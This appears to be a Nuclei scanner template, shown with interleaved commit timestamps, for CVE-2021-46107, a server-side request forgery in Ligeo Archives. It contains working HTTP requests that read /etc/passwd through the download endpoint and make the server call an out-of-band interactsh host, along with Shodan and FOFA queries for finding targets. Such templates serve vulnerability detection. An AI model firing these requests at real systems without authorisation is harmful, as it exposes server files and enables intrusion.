2023-08-31 19:49:52 +00:00
id : CVE-2021-46107
info :
name : Ligeo Archives Ligeo Basics - Server Side Request Forgery
author : ritikchaddha
severity : high
description : |
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability.
2023-08-31 19:49:52 +00:00
reference :
- https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-46107
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2023-09-01 02:52:14 +00:00
cve-id : CVE-2021-46107
2023-08-31 19:49:52 +00:00
cwe-id : CWE-918
metadata :
2023-09-06 12:09:01 +00:00
verified : true
2023-09-01 02:52:14 +00:00
max-request : 3
shodan-query : title:"Ligeo"
2023-09-06 12:09:01 +00:00
fofa-query : title="Ligeo"
2023-08-31 19:49:52 +00:00
tags : cve,cve2021,ligeo,ssrf,lfr
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
GET /archive/download?file=file:///etc/passwd HTTP/1.1
Host : {{Hostname}}
- |
GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
- "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"